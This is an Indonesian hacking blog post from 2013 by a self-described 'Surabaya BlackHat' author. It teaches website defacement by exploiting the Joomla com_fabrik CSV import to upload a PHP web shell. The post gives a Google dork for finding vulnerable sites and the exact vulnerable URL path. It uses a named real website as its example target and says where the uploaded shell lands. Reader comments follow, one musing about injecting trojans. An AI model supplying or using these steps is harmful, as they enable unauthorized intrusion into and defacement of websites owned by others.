Minggu, 07 April 2013

Deface Dengan Joomla Component [Com_Fabrik] Remote Shell Upload Vulnerability

Ini sebenarnya bug lama. Namun ternyata sampai sekarang masih ada saja situs yang vuln dengan bug ini. Tentu saja dengan kesabaran dalam mencari target dan kepandaian mengolah google dork.
Oke, langsung saja.
Google Dork :
inurl:index.php?option=com_fabrik atau index.php?option=com_fabrik [dork kreasikan sendiri. pemalas nggak bakalan sukses !]
Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Sebagai contoh, saya pilih http://www.duo-d-art.ch/index.php?option=com_fabrik

Ubah urlnya menjadi : http://www.duo-d-art.ch/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


Oke, kita melihat ada tempat upload disitu. Kita upload saja shell kita. Kadang bisa langsung upload php, kadang tidak bisa. Namun kali ini kebetulan bisa. :p . Tinggal browser file, lalu klik Import CSV

Dan shell kita akan terletak di [site]/media/[shell.php]


Terus,  hajar !!!!
We Are Surabaya BlackHat !
Sekian tutorial kali ini, semoga bermanfaat.
Judul: Deface Dengan Joomla Component [Com_Fabrik] Remote Shell Upload Vulnerability
Ditulis oleh YuyudHN
Rating Blog: 5 dari 5

Suka artikel kami ? Masukkan e-mail anda untuk berlangganan artikel secara gratis !

=== FIND US ON FACEBOOK ===

Artikel Terkait Hacking

34 komentar:

  1. mampir lagi mau membawahkan kopi hahaha

    BalasHapus
  2. hadir hadir belajar menyimak sobat :-)

    BalasHapus
  3. xixixi kata katanya mantep :D pemalas gak akan sukses ...

    BalasHapus
  4. Tipa hari ada saja ide-ide baru ya sob tiap kali saya kesini.Luar biasa ini kreatifitasnya :)

    BalasHapus
  5. Saya jujur kurang begitu mengerti masalah begini pak, masih bingung :(


    salam guru pantura.

    BalasHapus
  6. Wah dahsyat ilmunya sob..

    BalasHapus
  7. masih tetep pake injeksi ya.. Kalo di gabungin dengan virus gimana ya, mungkin aja trojan itu di gabungin sama sality terus di injeksi ke file nya .... Nyam nyam nyam

    BalasHapus
    Balasan
    1. Lebih suka gini. Cara klasik tp tetep banyak hasil. . . :v

      Hapus
  8. Salud nih sama mas adminnya....
    Selalu ada ilmu dan bahan utk di post
    #laporan hadir ya sob... :)

    BalasHapus
  9. ampuuun
    ga mudeng babar blas kalo yang beginian
    haha piss

    BalasHapus
  10. saya g ngerti dengan yang beginian.. Haha.

    BalasHapus
  11. waduh.. maaf sob baru sempat mampir nih. lagi sibuk di dunia nyata.. dan nyempet2in mampir di sini. hehehehe..

    BalasHapus
  12. ditunggu komennya ama visitnya
    di
    http://cyberask.blogspot.com

    BalasHapus
  13. file csv tuh gimana min ?

    BalasHapus
  14. Aq kn berhasil upload shell nya. trz letaknya ada dimana y.?? koq di [site]/media/[shell.php ada .??

    BalasHapus
  15. lagu di blognya judulnya apa y

    BalasHapus
  16. gimana caranya tau kalo kita udah berhasil upload shell??

    BalasHapus

Dilarang mencantumkan link hidup di dalam komentar !
Yang ingin bertukar link, klik Link Exchange.
Fuck you spammer. You not allowed to leave comment in this blog !